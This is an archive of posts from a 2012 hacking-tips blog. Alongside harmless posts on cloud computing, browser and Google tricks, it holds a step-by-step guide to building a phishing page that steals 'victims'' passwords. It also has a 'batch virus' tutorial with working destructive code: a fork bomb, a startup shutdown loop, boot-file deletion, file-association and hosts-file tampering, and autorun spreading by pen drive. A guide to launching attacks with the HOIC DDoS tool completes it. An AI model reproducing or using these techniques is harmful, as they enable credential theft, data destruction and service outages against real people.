This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Monday, 20 August 2012

Make Your Blog Or Wordpress Site Password Protected.

Protecting your blogger or wordpress blogs from spammers, clickers and other frauds have always been a major key point in any website designer life. If you are a blogger you will try to make your website safe from people you do not want to enter in your website or you do not want anyone to comment on your website, well I simply mean stopping unauthorized access to your website.

Well today we are going to teach you how you can easily add a password to your blogger or wordpress blog and when ever a person pumps in your websites address he will be greeted with a password prompt dialog, where he have to enter the password kept by you if he fails to enter the password then he will be redirected to your desired website.
1. Go to Blogger > Template > Edit HTML
2. Now press Ctrl + F and search for the </body> tag and add below code above it.
<script>
var password = 'Password-Here'
password=prompt('Please enter the password to enter this site:','');
if (password != 'Password-Here') {
location.href='Redirect-URL-Here'}
</script>
3. Now just press Save Template and refresh your blog to see the password asking popup.

Customizations :

You can change the password according to your wish, just change the letters in red color to your password. You can add any URL to which the visitor will be redirected if he enters the wrong password or cancel to add any password, just change the Blue line in the above code with your URL.

Wednesday, 13 June 2012

Simplest way to creat phishing page of any website.

Here i want to show you how to make a phishing page using a Phishing Creator - Super Phisher and get account information for various websites from many people. Тhis is the easiest and also a very effectively way to make a phisher and hack any website account password.

Here are some features of Super Phisher:

  • Fastest phisher maker tool ever
  • Makes phisher for almost any site
  • Useful for users who don't knows HTML, PHP coding
  • No manual work except entering URL of website, for which u want to make phisher
  • Fully automated tool
  • Small in size.
  • Instant access to phishers you created.

For example i will show you how to make a phishing site of Lockerz.com.
Here is a step by step guide to hack any website account password using phishing creator tool:
  1. First of all Download Super Phisher
  2. In "Super Phisher" folder, open "Super Phisher.exe" file to get something like:
  3. Now, in "URL of Login Page", enter http://www.lockerz.com. This is the site you want to hack.
  4. In "Name of Log File" write password.txt or whatever you like. This is the place where all typed id and password are stored. In "Name of PHP File" also type anything you like, e.g. lockerz.php or login.php...
  5. In field of "Site redirect to", enter http://www.lockerz.com/myLocker, so that victim is redirected to original Locker site when he enters his email and password.
  6. Click on "Build Phisher" and you will get Lockerz phisher created in "Output" folder in current directory.
  7. Upload all of the phisher files to any free webhost site like: RipWay or 000webhost.com
  8. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Lockerz account using your sent Phisher.
  9. Once he logs in to his Lockerz account using Phisher, all his typed email and password is stored in "password.txt".
  10. Now you can see password in this .txt file and hack Lockerz account password.
Enjoy Phishing

Sunday, 10 June 2012

Steganography-Art of hiding Text in media Files.


Ever wondered to know how to hide secret messages in images, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.
 

What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.
The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.
 

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.
Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.
 

How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.
There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However I have  managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link.
Download Stego Magic
 
The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.
With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.
At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.
 

How to Use Stego Magic?

Suppose you want to hide a text message inside a JPG file:
1. Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe
2. Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.
3. Note down the secret decryption key.
Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key.
I hope you enjoy this post :) . For queries and feedback, please pass your comments .

Thursday, 12 April 2012

Fix screen resolution for BackTrack VM under VirtualBox

 Revisions: 20110521 - Revised to show the fix for BT5 

On BT5

The following worked with no fuss:
# Xorg -configure
# cp /root/xorg.conf.new /etc/X11/xorg.conf
# startx
And that’s it!

On BT4
Note to self.  To fix the screen resolution for X on a host running BackTrack on VirtualBox…
Modify the “Screen” section in /etc/X11/xorg.conf to read as follows:
Section "Screen"
Identifier           "Default Screen"
Monitor             "Configured Monitor"
Device               "Configured Video Device"
DefaultDepth     24
SubSection "Display"
Depth    24
Modes   "1024x768" "800x600"
EndSubSection
EndSection

Saturday, 7 April 2012

Some Intresting & Funny tricks for Firefox

Firefox is one of best browser and there are some Intresting  tricks that you can do with your firefox browser.These will not harm your browser and they are tested in the latest version of firefox i.e firefox 4.0


Here are Some Intresting & funny Firefox Tricks


To perform these tricks open your firefox browser and copy/paste the following in your address bar
 
chrome://global/content/alerts/alert.xul
 This will show you dancing firefox.Your firefox window will automatically popup anywhere at screen.

chrome://browser/content/browser.xul
This will open another firefox within in a new tab.So you will have firefox within firefox.

 chrome://browser/content/preferences/preferences.xul
This will open firefox options dialog box in new tab.

chrome://browser/content/bookmarks/bookmarksPanel.xul
This will open your firefox bookmark manager in new tab.

chrome://browser/content/history/history-panel.xul
This will open your history in new tab.

 chrome://mozapps/content/extensions/extensions.xul?type=extensionsThis will open your extensions tab in your current window .

chrome://browser/content/preferences/cookies.xul
This will Open the “cookies window” inside a tab in the Firefox window.

chrome://browser/content/preferences/sanitize.xul
This will Open the “Clear Private Data” window inside the current tab.

chrome://browser/content/aboutDialog.xul
This will Open the “About Firefox” Dialog box inside the tab.

chrome://browser/content/credits.xhtml 
This will Open a scrolling list of names. The one’s who we must thank for creating Firefox

Thursday, 5 April 2012

Install Windows-XP in 10 minutes.



STEP1 : After the Copy Part is Over ... System is Rebooted as we all know In general Formatting Procedure...

Now After Reboot The Below Image Will Appear....

                                                         

STEP 2: Now As This Image APPEARS You Have to Press "Shift + F10 " . This Will Open The command Prompt... Now type taskmgr in it. This will open the Task manager .

STEP 3 : After The task Manager Opens Goto Processes ... And Find "Setup.exe" process and Right CLICK on It.... and set the Priority to Highest....
                                           

STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)....

Thats the Overall Tutorial...Hope You all Have LIKED IT...
So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes...

Monday, 2 April 2012

The Pirate Bay Buys Greek Airspace for Launching Low Orbit Server Drones

 
 Few days back we reported that, One of the world's largest BitTorrent sites "The Pirate Bay" is going to put servers on GPS-controlled aircraft drones in order to evade authorities who are looking to shut the site down.


Most of the people from World didn't take it serious, well but The Pirate Bay is apparently deadly serious about investing in drone servers that it will fly in international airspace to make it incredibly difficult for governments to stop its expansion.



A blog posting on the Pirate Bay site said the service had gone offline for a few hours on 18th March to move its front machines (which redirect a user’s traffic to a masked location). “We have now decided to try to build something extraordinary,” it said.

If actually happening, it is part of a wider move to stay several steps ahead of the law, with The Pirate Bay gleefully thumbing its nose at the legislative attempts to bring it down. While a number of users are relying on VPNs (virtual private networks) to mask what they are doing online, some services are offering something similar, but on a mass scale.


Here’s the full announcement.
“Political power in Athens, Greece, today signed an agreement with representatives for The Pirate Bay (TPB) about exclusive usage of the greek airspace at 8000-9000ft.


- This might come as a shock for many but we believe that we need to both raise money to pay our debts as well as encourage creativity in new technology. Greece wants to become a leader in LOSS, says Lucas Papadams, the new and crisply elected Prime Minister of Greece.


LOSS that he is referring to is not the state of finances in the country but rather Low Orbit Server Stations, a new technology recently invented by TPB. Being a leader for a long time in other types of LOSS, TPB has been working hard on making LOSS a viable solution for achieving 100% uptime for their services.


- Greece is one of few countries that understands the value of LOSSes. We have been talking to them ever since we came up with the solution seeing that we have equal needs of being able to find financially sustainable solutions for our projects, says Win B. Stones, head of R&D at TPB.


The agreement gives TPB a 5 year license to use and re-distribute usage of the airspace at 8000-9000 ft as well as unlimited usage of the radio space between 2350 to 24150 MHz. Due to the financial situation of both parties TPB will pay the costs with digital goods, sorely needed by the citizens of Greece.”


The sign off in the Pirate Bay blog – “when time comes we will host in all parts of the galaxy, being true to our slogan of being the galaxy's most resilient system” appears intentionally hyperbolic.

Sunday, 1 April 2012

GUI For The John The Ripper -JOHNNY Is Launched.


 Johnny is a GUI for John the Ripper. It was proposed by Shinnok. s release includes all things from development release plus nice tabbed panel for mode selection and some additional clean-ups. Basic functionality is supposed to work: password could be loaded from file and cracked with different options.



The reasoning behind Johnny is simple but at the same time profound: Complexity through simplicity and non-intrusive expert and non-expert availability. Johnny is a GUI concept to John the Ripper written in C++ using the Qt framework, making it cross-platform on both Unix/Linux and Windows operating systems.
                                             

It was programmed as a part of the Google Summer of Code 2012 and supports bother 32-bit and 64-bit architectures. The interface also leaves room for lots of new options, either future John options, as well as GUI specific options like, hash detection, dictionary editing and generation or interactive bruteforce charsets or rules creation and many more.
Download Jonny

Thursday, 29 March 2012

How To FInd All Google Doodles




Hello Guys,
Today I'm Going to share how to find all Previous and Current Google Doodles .
but first of all if you are a regular reader you might be knowing already about my previous articles about Google Doodles .
Google Doodles celebrates all Holiday and Events in Google style.

so know first of all i'm going to write how i found this Index of Google Doodles.
without using any Google dorks.so  first open Google.com and right click on the Logo or Doodle.you will find a option called View Background Image or View Image.so just click on it.
and in this case you will find URL like
http://www.google.co.uk/logos/2011/Edmond_Haley-2011-hp.jpg

so if you Focus on this image link you will find
http://www.google.co.uk/logos visit this link or
 http://www.google.com/logos
according to this index, the first Google Doodle was :
Burning Man festival on Aug 30, 1998


you can able to collect all previous and current logos from 1998- to the current year .so it was just my stupid research :D share it if you like it .
Enjoy... and

Send Private Self Destructive Message.



Hi frendz,Do you also want to send such self destructive mails which can be read only once?? here follow the steps
2) Click on the button to create a message, and then enter your message. You have up to 1,000 characters.
3) After entering your message and creating a link, you will be presented with a secure URL to copy and send to the recipient. Keep in mind, if you were to visit the link yourself, no one else will be able to view the message. It literally is one view and then gone.
What does it look like on the recipient’s end?


Best Temporery Email Services @ Internet.


People use temporary email services when they are unwilling to reveal their actual email address mainly because they fear spam ( which is a good thing ). Dear friends temporary mails are used as below reasons:



  • It is used for those site which enter the person with email subscription
  • It used for security purpose
  • Its used for fake mails
  • Its used for temporary and not annoy you with their mails
  • Track email through a RSS feed

While there are several disposable email services like: 
  etc, a new web service called Mmmmail lets you enjoy the benefits of disposable email with an additional ability to track email through a RSS feed. Just head over to their website, put a desired nickname for your disposable email address and click on check mmmmail ! You'll presented with a link to rss feed which keeps track of all emails sent to that temporary address. Check it out here and share your views.

Monday, 26 March 2012

Apple Tried to Hire Linus Torvalds, Kill Linux


Could you imagine a world without Linux?
Such a thought could have been stark reality had Apple managed to successfully recruit Linus Torvalds back in 2000.
The founder of Linux was invited to Apple HQ in Cupertino by Steve Jobs at the turn of the millennium, where is was invited to join Apple and work on (what would become) OS X.
The lure? ‘Unix for the biggest user base’.
The catch? That he would have to stop development on Linux, a condition that led Torvalds to flatly refuse the offer.
Imagine: no Linux would have meant no Ubuntu, no ChromeOS, and no Android; the entire ecosystem of technology could have been dramatically changed by acceptance of this one job offer.
This revelation isn’t actually new, but as it’s been cropping up on social sites for the last few days I thought we should mention it too.

Friday, 23 March 2012

Benefits Of Cloud Computing.

Cloud Computing is an internet-based computer network, where a resource, software and applications are shared to be utilized by other computers connecting to it. This is a whole new form of computing concept. Why is this novel concept referred to as cloud computing? It is because the internet is often visualized as a big cloud consisting of a large network of computers connected to each other.

In essence cloud computing can be defined as a set of computers connected together sharing applications stored on the internet-based server allowing thousands of users from all around the world to access something without having to download and install anything on their own computers. An example of this would be Google Docs.
So what is the big deal about cloud computing? What makes it so fabulous? Here are just a few of the reasons:
                                         
  • Savings Through Reduced Energy Usage: Using cloud computing technology the need to maintain room temperatures to cool down servers goes down compared to the old way of computing.
  • Easy Backup & Recovery: Servers that run inside a virtual machine can be stored in one image file containing the entire system configuration and settings. In case a server crashes, you don’t have to scratch from beginning to perform reinstallation and reconfiguration. Simply take a copy of the saved image, restore data from last backup and the server will be back up and running again. You can save time, effort and resources.
  • Easy Deployment: Virtual servers can be cloned as much as possible and can be run on another machine without having to change configuration, hence reducing the workload of IT staff and expediting the process.
  • Maintenance & Management Made Easy: Fewer number of servers will automatically reduce the time and cost to manage servers.
  • Slashing Of Hardware Costs: Companies can cut down on hardware investment because by using cloud computing they do not have to purchase additional servers, peripherals and other network gear.
  • Lesser Space Demands: The fewer the number of servers the less space needed to store the network equipment, the server is placed on a shared server or data center.
  • Hardware Standardization: Hardware virtualization in cloud computing involves emulation and encapsulation so that the process of introduction and removal of a particular hardware can be carried out with ease.
  • Easy Replacement and Upgrading: Replacing or upgrading a server specification can be easier to execute using cloud computing. If the parent server is overloaded and specifications are not sufficient anymore, we can easily upgrade the specification or move a virtual machine to another, more powerful server.

There are plenty of benefits in working with cloud computing, and many outweigh the reasons why not to use cloud computing. Cloud computing is still growing and many government bodies and company organizations already use this type of network for their businesses. This type of computing allows them to focus on what matters and not to worry about technology side of things. Cloud computing does have its place, though it is not for all companies.

What Is Cloud Computing? Explained In Simple Words


I’m sure you’ve heard the following two words being used extensively online in the last couple of years. Cloud Computing. The next time you read something about a service that mentions ‘Cloud’, you will immediately know what they mean by that, and what exactly cloud computing is and how does it work.

What is Cloud Computing and how does it work, explained in simple terms?

Actually, you’ve been using cloud computing all this time, unless you were living in a cave somewhere, and that cave somehow didn’t have an internet connection.

So let me put this in as simple terms as possible:
Cloud Computing is the ability to use the power of other computers (located somewhere else) and their software, via the Internet (or sometimes other networks), without the need to own them. They are being provided to you, as a service.

That means you don’t have to go and buy some super powerful gigantic computer system and risk have it sitting there, doing nothing. By utilizing the cloud, everything is ready for you whenever you might need it. Exactly where the hardware and software is located and how it all works doesn’t matter to you, as a user. It’s just somewhere up in the vast “cloud” that the Internet represents.
Now you know one of the reasons they call it the Cloud Computing.
One good example of someone who provides these types of cloud services would be RackSpace cloud company.

To illustrate the point even better, let’s go over one typical example of cloud computing that you must have used before (exception are those with the cave thing
from above.)

                            
  Google as an example of cloud computing

What happens when you type and search something on Google?
Have you ever thought about this? Does your PC goes through all that information, sorts it out for you and display all the relevant results? No, it doesn’t. Otherwise, you would wait much longer for a simple results page to display. A simple PC can’t process all those billions of websites in a fraction of a second, like Google does. Your PC only serves as a messenger to tell Google what you are looking for. Everything else is done by some of Google’s powerful computers located somewhere, Who-Knows-Where in the world.
Now, did you ever care about how or where that comes from? Why would you, right? Exactly. That’s a great example of how cloud computing is used.

At this point, I’m sure you understand what cloud computing is and the basic idea behind it. If that’s everything you wanted to know, you can stop here, and go enjoy your life knowing what Cloud Computing is. If you are interested in just a little tiny bit more about it, continue reading to the end (not long from here).

3 Types of Cloud Computing 

1. Infrastructure as a Service (IaaS) is basically when you buy raw computing hardware to use over the net, usually servers, or online storage. You buy what you need and pay-as-you-go. The best and the most basic example of this type of cloud computing is buying a web hosting for your website. You pay monthly fee to a hosting company for the storage on their servers and to have them serve up files for your website from those servers.

2. Software as a Service (SaaS) is a case where you use the complete software application that’s running on someone else’s servers. The best example of this is Google Docs, which you can use for creating and storing text documents, presentations, spreadsheets and so on…

3. Platform as a Service (PaaS) is case where you create applications using web-based tools so they run on systems software and hardware provided by another company. As an example, consider a situation where you develop your own e-commerce website but have the whole thing, including the shopping cart, checkout, and payment mechanism running on a merchant’s server.

That should be all you need to know to get you started.

As you can see, the idea behind cloud computing is very powerful and useful beyond measure. Especially now when you actually know what it is.

The Pirate Bay plans Low Orbit Server Drones to beat Censorship

One of the world's largest BitTorrent sites "The Pirate Bay" is going to put servers on GPS-controlled aircraft drones in order to evade authorities who are looking to shut the site down. In a Sunday blog post, The Pirate Bay announced new "Low Orbit Server Stations" that will house the site's servers and files on unmanned, GPS-controlled, aircraft drones.


TPB said:
With the development of GPS controlled drones, far-reaching cheap radio equipment and tiny new computers like the Raspberry Pi, we’re going to experiment with sending out some small drones that will float some kilometers up in the air. This way our machines will have to be shut down with aeroplanes in order to shut down the system. A real act of war.




We’re just starting so we haven’t figured everything out yet. But we can’t limit ourselves to hosting things just on land anymore. These Low Orbit Server Stations (LOSS) are just the first attempt. With modern radio transmitters we can get over 100Mbps per node up to 50km away. For the proxy system we’re building, that’s more than enough.



Low earth orbit is 100 miles up and requires a launch vehicle capable of achieving speeds of 17,000 miles an hour. At “some kilometers up in the air,” these drones would require significant power to stay afloat, and that’s even before the power required to transmit megabits per second over a wireless connection.

The LOSS are already in development, writes the blog from TPB. As you might wish to solve the energy problem, you have not thought about it well. And that will probably be the weak point. In the air it is hardly the drones now at least can fill up with energy. You will need to load them somewhere where they will be charged. By then, the authorities can access and turn off the drones easily.


It seems despite the will of the courts the pirate bay will not be going down without somewhat more of a fight.To learn more about the latest developments in the next generation of quadcopters check out the ted talk by the leader of the leading research group:

7 Ways to Improve Your Network’s Web Security



Admins looking to improve on their company’s web security often turn to software solutions to help assess and automate their security tasks. Good web security software can make surfing the web safe and secure by protecting users from potential vulnerabilities in their operating systems or browsers, as well as helping them to avoid policy violations. The top web security software packages can help you to improve your network’s web security in many ways. Here are seven of the major benefits web security software offers:


1. Automatic blocking of malicious content
Compromised websites can lead to compromised workstations. Whether it’s a malicious script or a media file, web security software can scan and block data before displaying it in a browser compromises a machine.


2. Scan downloads for malware
Users frequently go to the Internet to download files, whether those are programs, music, or screensavers. Web security software can scan those downloads with multiple anti-malware engines to ensure maximum protection for your users.


3. Support acceptable use/appropriate content policies
There’s a time and a place for most things; but many of those things are not appropriate at the workplace. Web security software can proactively block access to websites containing content that is not right for access during working hours, which helps users avoid policy violations or other situations that can impact others.


4. HTTPS inspection
Many times, HTTPS is used to get around filters and proxies because they cannot inspect encrypted traffic. With all the Certificate Authorities that have been compromised in the past few months, this could be a huge risk, but the best web security software can use PKI to scan even HTTPS traffic while still protecting the confidentiality of data.


5. Bandwidth controls prevent impact to mission critical apps
Web security software can also enforce bandwidth limits on users’ browsing, so that your ecommerce site, email system, etc., don’t suffer from slow performance due to Internet access.


6. Block phishing sites
You can read a new story every week about a company that lost data, money, and customer confidence because an employ fell victim to a phishing attack. Web security software can stop these kinds of scams dead in their tracks by blocking access to phishing sites.


7. The exception is the rule
The best web security software should use a combination of lists, categories, reputation, whitelists and blacklists to control Internet access, and easily allow admins to create exceptions when a site may be categorized one way, but is still necessary for a business purpose.



With good web security software, administrators can allow their users safe and secure access to the Internet, while protecting them, the company’s data and reputation, and their customers from the worst the web has to offer. Web security software is the right way to take advantage of the best that Internet access has to offer, while avoiding the worst threats that are out there. Web security software is one of the must-have applications every network admin needs.


This guest post was provided by Casper Manes on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. Learn more on what to include in your web security strategy.


All product and company names herein may be trademarks of their respective owners.

Tuesday, 20 March 2012

Batch Files!The Art Of Creating Virus.

Hello Guys,Today lets discuss about how to create our own batch virus and spread itI could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of batch files clear and developing the approach to code your own viruses.


What are Batch Files ?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one


1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
 
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
 
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file


So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.


What can batch viruses do ?


They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.


Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).


Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.


1. Application Bomber


@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop


This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.


2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x


Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.


3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x


This code would start creating windows user accounts whose names could be any random numbers.


3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds


Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup




Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.


4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply


Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.





Lets make a batch file to
delete this file from victim's computer and the windows will not start then.


attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file


After running this batch file , system will not reboot and a normal victim would definitely install the windows again.





5. Fork Bomb


%0|%0 //Its percentage zero pipe percentage zero


This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .








6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything




Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.




7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.


@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.


Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.


Viruses we just coded







Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.


To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.


After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.


You can use other options as per your requirement.


Spreading batch viruses through pen drive -:


Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico


Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .


When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Tuesday, 13 March 2012

HOIC - Another DDOS tool by Anonymous

A new DDOS tool is release by Anonymous called high-orbit ion canon or HOIC. This release is only for windows and has a nice GUI. If the attackers. see the home screen of the software. 



There are two round buttons under the target label. Click on the+ sign to add a website to attack and - sign button is used to remove a website. Set the number of threads and increase it to increase the strength of the attack. 


When you click on the+ button, a new window will open where you can specify following things

  • URL - is the target website to attack
  • Power -> sets the request velocity.  
  • Booster - are config scripts that define the dynamic request attributes
HOIC includes a new feature called 'boosters' which are files you download or add to an attack machine which enables the attacker to manipulate headers such as language, referrer, host, etc.

To launch the attack click on "FIRE TEH LAZER!" button.


HOIC uses some randomization techniques to evade the detection.But there are some requests which can be used to detect. This tool is strictly an HTTP DOS attacking tool while LOIC has TCP, UDP and HTTP attack options.


As compared to LOIC, this tool seems to be more complicated. New Boosters script makes it harder to use. Becauase downloading and then configuring Boosters is not so easy. This new tool only focuses on HTTP attack.

How Cross-Site Scripting (XSS) Works.


XSS vulnerabilities (Cross-Site Scripting vulnerabilities) are often overshadowed by their big cousin, the infamous SQL Injection. This does not make them any less effective or deadly. XSS and SQL Injection attacks are similar in the way they inject malicious code. The difference is that an SQL attack, injects code into the target database whereas an XSS attack injects code into the target browser. In an XSS attack the hacker uses your website to inject code into your visitor’s browser.





Once a user is infected, the malicious code can do a variety of things. It can change the color scheme of the page the user is viewing. It can do more nasty things such as replacing images with pornographic content. Using the same techniques, links on the page may be re-written to point to malicious locations. Sometimes clicks can also be forced, simulating user action without his knowledge. Another popular XSS attack reads out the user’s cookie and transmits it to the hacker. This allows him to impersonate the user and hijack his session. If the user happens to be the system administrator, the hacker can take over the entire website.


In this video tutorial I demonstrate what an XSS attack is to show you how a hacker can use XSS vulnerabilities to hack into your website. I start the video by explaining the mechanisms of cross site scripting, and I proceed to demonstrate a number of pranks you can play on unsuspecting users. I also demonstrate how cookies can be stolen to hijack sessions and I take a peek into the vulnerable code that allows such attacks. I hope that this video will both entertaining and educational, and that by learning about XSS you can keep your own website safer.

SOURCE: http://www.acunetix.com/blog/web-security-zone/articles/video-how-cross-site-scripting-xss-works/

Monday, 12 March 2012

Amazing Funny Google Tricks.


I’m going to show you some funny and amazing tricks that you can do with Google. Most of these tricks use the very famous “I’m Feeling Lucky Button”.
Note: To do most of the tricks below, you must turn off Instant Search first.

Funny and Amazing Google Tricks:

1. Google Gravity

With this cool trick, you’re going to see Google logo and other stuffs on the Google homepage falling down to the bottom of the browser.
Google Gravity Trick
To do this trick, just visit Google Gravity or go to Google.com and type in Google Gravity then click I’m Feeling Lucky button.

2. Epic Google

Want to make the font size of the Google homepage excessively bigger? To do so, just go to Google.com, type Epic Google and click I’m Feeling Lucky button.

3. Weenie Google

This is the opposite of Epic Google. To try this trick, just go to Google.com, type Weenie Google and click I’m Feeling Lucky button.

4. Elgoog

Google homepage written in backwards (Google Mirror). To do this trick, just go to Google.com and type in Elgoog then click I’m Feeling Lucky button.

5. Find Chuck Norris

  • Go to Google.com
  • Type in “find Chak Noris”
  • Click I’m Feeling Lucky button

Chuck Norris Google Trick
6. French Military Victories? Or did you mean…

To do this trick, go to Google.com and type in French Military Victories. Now click I’m Feeling Lucky button and look at the question Did you mean.

7. Google Hacker

Have you ever wondered what will happen to Google homepage if it gets hacked? Try this trick to see the hacked version of Google.
  • Go to Google.com
  • Type in Google Hacker and click I’m Feeling Lucky button.
Google Hacker
I never thought that the Jejemon language has already spread all over the world. I thought it’s just here in the Philippines.

8. Play PacMan on Google

I’m sure most of you are already familiar with this trick but for the benefit of our other friends, I’m going to show you how you can play PacMan on Google (single or multiplayer mode).
Play PacMan On Google
  • Go to http://www.google.com/pacman/
  • If you want to play PacMan on single mode, click the Insert Coin button beside Google Search but if you want to play on multiplayer mode, click the Insert Coin button twice.
  • Multiplayer mode controls: Arrow keys and A,S,D,W keys

9. Change background image

With this trick, you can add a custom background image on Google homepage. Find out how by clicking this link: Change Google homepage

10. Google’s different languages

11. Do a Barrel Roll (new!)

This trick has become trending in Twitter and even in Facebook! Among the Google tricks here, this one is my favorite! To see it in action, just go to Google.com and search for “Do a Barrel Roll” without the “”.
If you’re kinda lazy, just click this link and I’ll Google it for you.
Thanks to Sivleptcb for the heads up!

12. Tilt

This one is another cool trick which is almost the same as the “Do a Barrel Roll”. Just go to Google and search for “tilt” without the “” to see it in action.
Again, if you’re feeling lazy, just click this link and I’ll Google it for you.
Thanks to Nutle for sending us this tip!
